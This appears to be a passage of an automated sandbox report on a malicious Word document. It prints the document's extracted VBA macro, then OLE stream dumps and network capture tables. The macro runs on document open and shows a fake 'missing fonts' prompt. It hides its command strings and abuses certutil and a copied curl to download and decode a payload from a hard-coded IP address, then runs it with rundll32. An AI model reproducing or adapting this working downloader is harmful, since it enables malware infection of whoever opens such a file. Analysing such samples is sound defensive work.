ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3)

    .InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3)
    .InsertParagraphAfter
    End With
End Sub

'Show msgbox
Sub MsgFunc()
    Dim Msg, Style, Title, Help, Ctxt, Response, MyString
    Msg = "The document cannot be fully displayed due to missing fonts. Do you want to install missing fonts?"    ' Define message.
    Style = vbYesNo Or vbCritical Or vbDefaultButton2    ' Define buttons.
    Title = "Missing font"    ' Define title.
    Help = "DEMO.HLP"    ' Define Help file.
    Ctxt = 1000    ' Define topic context.
    ' Display message.
    Response = MsgBox(Msg, Style, Title, Help, Ctxt)
    If Response = vbYes Then    ' User chose Yes.
        MyString = "Yes"    ' Perform some action.
        DeleteText
    Else    ' User chose No.
        MyString = "No"    ' Perform some action.
        'MsgFunc
    End If
End Sub

Sub MainFunc()
    Dim curl_enc_txt_path As String
    Dim curl_dec_exe_path As String
    Dim mal_enc_txt_url As String
    Dim mal_enc_txt_path As String
    Dim mal_dec_exe_path As String
    Dim pp As String
    Dim cc As String
    Dim dir As String
    Dim host As String

    dir = ActiveDocument.Path
    dir = Environ("temp")
    host = "http://172.104.160.126:8099"
    curl_enc_txt_path = dir + "\curl.txt"
    curl_dec_exe_path = dir + "\curl.exe"

    mal_enc_txt_url = host + "/payload2.txt"
    mal_enc_txt_path = dir + "\mscorsvc.txt"
    mal_dec_exe_path = dir + "\mscorsvc.dll"

    pp = pp + "C:\Windows\Sys"
    pp = pp + "tem32\cmd.exe /c "
    cc = cc + curl_enc_txt_path + curl_dec_exe_path
    pp = pp + "xcopy C:\Windows\Sys"
    cc = cc + curl_enc_txt_path + mal_enc_txt_url
    pp = pp + "tem32\cu" + "rl.exe " + dir + " & "
    cc = cc + mal_enc_txt_path + mal_enc_txt_url
    pp = pp + "certutil -f "
    cc = cc + mal_enc_txt_path + mal_dec_exe_path
    pp = pp + "-encode " + dir + "\cu" + "rl.exe " + curl_enc_txt_path + " & "
    cc = cc + pp + mal_dec_exe_path
    pp = pp + "certutil -f "
    cc = cc + pp + dir
    pp = pp + "-decode " + curl_enc_txt_path + " " + curl_dec_exe_path + " & "
    cc = cc + curl_enc_txt_path + dir

    pp = pp + curl_dec_exe_path + " " + mal_enc_txt_url + " -o " + mal_enc_txt_path + " & "
    cc = cc + curl_enc_txt_path + dir
    pp = pp + "certutil -f "
    cc = cc + curl_enc_txt_path + curl_dec_exe_path
    pp = pp + "-decode " + mal_enc_txt_path + " " + mal_dec_exe_path + " & "
    cc = cc + mal_enc_txt_url + curl_dec_exe_path

    pp = pp + "del " + dir + "\cu" + "rl.exe & "
    cc = cc + host + pp + curl_enc_txt_path
    pp = pp + "del " + curl_enc_txt_path + " & "
    cc = cc + curl_enc_txt_path + dir
    pp = pp + "del " + curl_dec_exe_path + " & "
    cc = cc + curl_dec_exe_path + pp

    pp = pp + "del " + mal_enc_txt_path + " & "
    cc = cc + mal_enc_txt_path + pp

    Dim vbDblQuote As String
    vbDblQuote = Chr(34)
    pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "
    cc = cc + mal_dec_exe_path + pp

    pp = pp + "exit"
    cc = cc + dir + pp
    'pp = pp + "cmd.exe -d & exit"
    'cc = cc + mal_enc_txt_url + curl_dec_exe_path
    ' Shell (pp), vbHidden

    Dim objShell As Object
    Set objShell = CreateObject("WScript.Shell")
    objShell.Run pp, 0, False
End Sub


Sub Document_Open()
    MainFunc
End Sub

Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 376

General
Stream Path:	PROJECT
CLSID:
File Type:	ASCII text, with CRLF line terminators
Stream Size:	376
Entropy:	5.349004928853029
Base64 Encoded:	True
Data ASCII:	I D = " { 6 3 9 4 0 D 1 7 - 7 B C 7 - 4 1 4 6 - B A 9 5 - 1 3 8 9 F F 7 0 2 C 5 8 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 5 D 7 6 E 4 7 9 6 1 8 9 A 1 8 9 A 1 8 9 A 1 8 9 A " . . D P B = " A A A 8 1 1 B 6 E 7 B 7 E 7 B 7 E 7 " . . G C = " 7 F 7 D C 4 E D 4 C 1 7 2 0 1 8 2 0 1 8 D F " . . . . [ H o s t E x t e n d e r I n f
Data Raw:	49 44 3d 22 7b 36 33 39 34 30 44 31 37 2d 37 42 43 37 2d 34 31 34 36 2d 42 41 39 35 2d 31 33 38 39 46 46 37 30 32 43 35 38 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69

Stream Path: PROJECTwm, File Type: data, Stream Size: 41

General
Stream Path:	PROJECTwm
CLSID:
File Type:	data
Stream Size:	41
Entropy:	3.0773844850752607
Base64 Encoded:	False
Data ASCII:	T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
Data Raw:	54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00

Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 2976

General
Stream Path:	VBA/_VBA_PROJECT
CLSID:
File Type:	data
Stream Size:	2976
Entropy:	4.617966626265468
Base64 Encoded:	False
Data ASCII:	a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o
Data Raw:	cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2782

General
Stream Path:	VBA/__SRP_0
CLSID:
File Type:	data
Stream Size:	2782
Entropy:	3.5082390293182035
Base64 Encoded:	False
Data ASCII:	K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ J . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . U . B - . . . . . . . . . . . . . .
Data Raw:	93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 80 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00

Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 174

General
Stream Path:	VBA/__SRP_1
CLSID:
File Type:	data
Stream Size:	174
Entropy:	1.6032810527820052
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 06 00 00 00 00 00 00 09 11 04 00 00 00 00

Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 1224

General
Stream Path:	VBA/__SRP_2
CLSID:
File Type:	data
Stream Size:	1224
Entropy:	2.0062113510689086
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 05 00 05 00 05 00 00 00 31 09 00 00 00 00 00 00 00 00 00 00 11 0c 00 00 00 00 00 00 00 00 00 00 51 0d 00 00 00 00 00 00 00 00

Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 356

General
Stream Path:	VBA/__SRP_3
CLSID:
File Type:	data
Stream Size:	356
Entropy:	2.1693699541959686
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . 8 . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . ` . . . . 8 . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 38 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 04 60 00 00 e1 0d ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00

Stream Path: VBA/dir, File Type: data, Stream Size: 514

General
Stream Path:	VBA/dir
CLSID:
File Type:	data
Stream Size:	514
Entropy:	6.2857106919283545
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . > h . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . . . . * \\ C . . . . . m A ! O f f i c g O D . f . i . c g . . ! G {
Data Raw:	01 fe b1 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 e3 3e ab 68 02 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 22, 2024 15:52:01.657860994 CEST	49170	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:52:01.657906055 CEST	443	49170	142.250.203.100	192.168.2.22
Jul 22, 2024 15:52:01.657973051 CEST	49170	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:52:01.658164978 CEST	49170	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:52:01.658181906 CEST	443	49170	142.250.203.100	192.168.2.22
Jul 22, 2024 15:52:02.368962049 CEST	443	49170	142.250.203.100	192.168.2.22
Jul 22, 2024 15:52:02.369291067 CEST	49170	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:52:02.369309902 CEST	443	49170	142.250.203.100	192.168.2.22
Jul 22, 2024 15:52:02.370276928 CEST	443	49170	142.250.203.100	192.168.2.22
Jul 22, 2024 15:52:02.370346069 CEST	49170	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:52:02.371309996 CEST	49170	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:52:02.371380091 CEST	443	49170	142.250.203.100	192.168.2.22
Jul 22, 2024 15:52:02.566080093 CEST	49170	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:52:02.566097975 CEST	443	49170	142.250.203.100	192.168.2.22
Jul 22, 2024 15:52:02.765502930 CEST	49170	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:52:10.264959097 CEST	49171	443	192.168.2.22	172.217.168.14
Jul 22, 2024 15:52:10.264991999 CEST	443	49171	172.217.168.14	192.168.2.22
Jul 22, 2024 15:52:10.265041113 CEST	49171	443	192.168.2.22	172.217.168.14
Jul 22, 2024 15:52:10.265232086 CEST	49171	443	192.168.2.22	172.217.168.14
Jul 22, 2024 15:52:10.265249014 CEST	443	49171	172.217.168.14	192.168.2.22
Jul 22, 2024 15:52:10.954627991 CEST	443	49171	172.217.168.14	192.168.2.22
Jul 22, 2024 15:52:10.954966068 CEST	49171	443	192.168.2.22	172.217.168.14
Jul 22, 2024 15:52:10.954987049 CEST	443	49171	172.217.168.14	192.168.2.22
Jul 22, 2024 15:52:10.955338955 CEST	443	49171	172.217.168.14	192.168.2.22
Jul 22, 2024 15:52:10.955426931 CEST	49171	443	192.168.2.22	172.217.168.14
Jul 22, 2024 15:52:10.956016064 CEST	443	49171	172.217.168.14	192.168.2.22
Jul 22, 2024 15:52:10.956069946 CEST	49171	443	192.168.2.22	172.217.168.14
Jul 22, 2024 15:52:10.957026005 CEST	49171	443	192.168.2.22	172.217.168.14
Jul 22, 2024 15:52:10.957088947 CEST	443	49171	172.217.168.14	192.168.2.22
Jul 22, 2024 15:52:10.957223892 CEST	49171	443	192.168.2.22	172.217.168.14
Jul 22, 2024 15:52:10.957233906 CEST	443	49171	172.217.168.14	192.168.2.22
Jul 22, 2024 15:52:10.957267046 CEST	49171	443	192.168.2.22	172.217.168.14
Jul 22, 2024 15:52:11.004507065 CEST	443	49171	172.217.168.14	192.168.2.22
Jul 22, 2024 15:52:11.156836987 CEST	49171	443	192.168.2.22	172.217.168.14
Jul 22, 2024 15:52:11.231894016 CEST	443	49171	172.217.168.14	192.168.2.22
Jul 22, 2024 15:52:11.232101917 CEST	443	49171	172.217.168.14	192.168.2.22
Jul 22, 2024 15:52:11.232260942 CEST	49171	443	192.168.2.22	172.217.168.14
Jul 22, 2024 15:52:11.233057022 CEST	49171	443	192.168.2.22	172.217.168.14
Jul 22, 2024 15:52:11.233095884 CEST	443	49171	172.217.168.14	192.168.2.22
Jul 22, 2024 15:52:12.268873930 CEST	443	49170	142.250.203.100	192.168.2.22
Jul 22, 2024 15:52:12.268944025 CEST	443	49170	142.250.203.100	192.168.2.22
Jul 22, 2024 15:52:12.269156933 CEST	49170	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:52:13.470407009 CEST	49170	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:52:13.470443964 CEST	443	49170	142.250.203.100	192.168.2.22
Jul 22, 2024 15:53:01.925507069 CEST	49174	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:53:01.925563097 CEST	443	49174	142.250.203.100	192.168.2.22
Jul 22, 2024 15:53:01.925669909 CEST	49174	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:53:02.019361973 CEST	49174	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:53:02.019392967 CEST	443	49174	142.250.203.100	192.168.2.22
Jul 22, 2024 15:53:02.712658882 CEST	443	49174	142.250.203.100	192.168.2.22
Jul 22, 2024 15:53:02.713826895 CEST	49174	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:53:02.713850975 CEST	443	49174	142.250.203.100	192.168.2.22
Jul 22, 2024 15:53:02.714171886 CEST	443	49174	142.250.203.100	192.168.2.22
Jul 22, 2024 15:53:02.715807915 CEST	49174	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:53:02.715877056 CEST	443	49174	142.250.203.100	192.168.2.22
Jul 22, 2024 15:53:02.920512915 CEST	443	49174	142.250.203.100	192.168.2.22
Jul 22, 2024 15:53:02.920711994 CEST	49174	443	192.168.2.22	142.250.203.100
Jul 22, 2024 15:53:12.613501072 CEST	443	49174	142.250.203.100	192.168.2.22
Jul 22, 2024 15:53:12.613657951 CEST	443	49174	142.250.203.100	192.168.2.22
Jul 22, 2024 15:53:12.613740921 CEST	49174	443	192.168.2.22	142.250.203.100

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 22, 2024 15:51:57.115956068 CEST	53	62751	8.8.8.8	192.168.2.22
Jul 22, 2024 15:51:57.238284111 CEST	53	49881	8.8.8.8	192.168.2.22
Jul 22, 2024 15:51:58.478197098 CEST	53	63926	8.8.8.8	192.168.2.22
Jul 22, 2024 15:52:01.649885893 CEST	58095	53	192.168.2.22	8.8.8.8
Jul 22, 2024 15:52:01.650075912 CEST	54261	53	192.168.2.22	8.8.8.8
Jul 22, 2024 15:52:01.656579018 CEST	53	54261	8.8.8.8	192.168.2.22
Jul 22, 2024 15:52:01.657058001 CEST	53	58095	8.8.8.8	192.168.2.22
Jul 22, 2024 15:52:10.242295027 CEST	62453	53	192.168.2.22	8.8.8.8
Jul 22, 2024 15:52:10.242433071 CEST	50568	53	192.168.2.22	8.8.8.8
Jul 22, 2024 15:52:10.256547928 CEST	53	62453	8.8.8.8	192.168.2.22
Jul 22, 2024 15:52:10.284553051 CEST	53	50568	8.8.8.8	192.168.2.22
Jul 22, 2024 15:52:15.490757942 CEST	53	50337	8.8.8.8	192.168.2.22
Jul 22, 2024 15:52:22.489500999 CEST	53	53406	8.8.8.8	192.168.2.22
Jul 22, 2024 15:52:32.836777925 CEST	53	64687	8.8.8.8	192.168.2.22
Jul 22, 2024 15:52:50.519622087 CEST	53	51955	8.8.8.8	192.168.2.22
Jul 22, 2024 15:52:56.966444016 CEST	53	53060	8.8.8.8	192.168.2.22

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jul 22, 2024 15:52:10.284624100 CEST	192.168.2.22	8.8.8.8	d050	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 22, 2024 15:52:01.649885893 CEST	192.168.2.22	8.8.8.8	0xd6a8	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jul 22, 2024 15:52:01.650075912 CEST	192.168.2.22	8.8.8.8	0xd590	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jul 22, 2024 15:52:10.242295027 CEST	192.168.2.22	8.8.8.8	0x8833	Standard query (0)	sb-ssl.google.com	A (IP address)	IN (0x0001)	false
Jul 22, 2024 15:52:10.242433071 CEST	192.168.2.22	8.8.8.8	0xfe39	Standard query (0)	sb-ssl.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 22, 2024 15:52:01.656579018 CEST	8.8.8.8	192.168.2.22	0xd590	No error (0)	www.google.com			65	IN (0x0001)	false
Jul 22, 2024 15:52:01.657058001 CEST	8.8.8.8	192.168.2.22	0xd6a8	No error (0)	www.google.com		142.250.203.100	A (IP address)	IN (0x0001)	false
Jul 22, 2024 15:52:10.256547928 CEST	8.8.8.8	192.168.2.22	0x8833	No error (0)	sb-ssl.google.com	sb-ssl.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 22, 2024 15:52:10.256547928 CEST	8.8.8.8	192.168.2.22	0x8833	No error (0)	sb-ssl.l.google.com		172.217.168.14	A (IP address)	IN (0x0001)	false
Jul 22, 2024 15:52:10.284553051 CEST	8.8.8.8	192.168.2.22	0xfe39	No error (0)	sb-ssl.google.com	sb-ssl.l.google.com		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

sb-ssl.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49171	172.217.168.14	443	3428	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
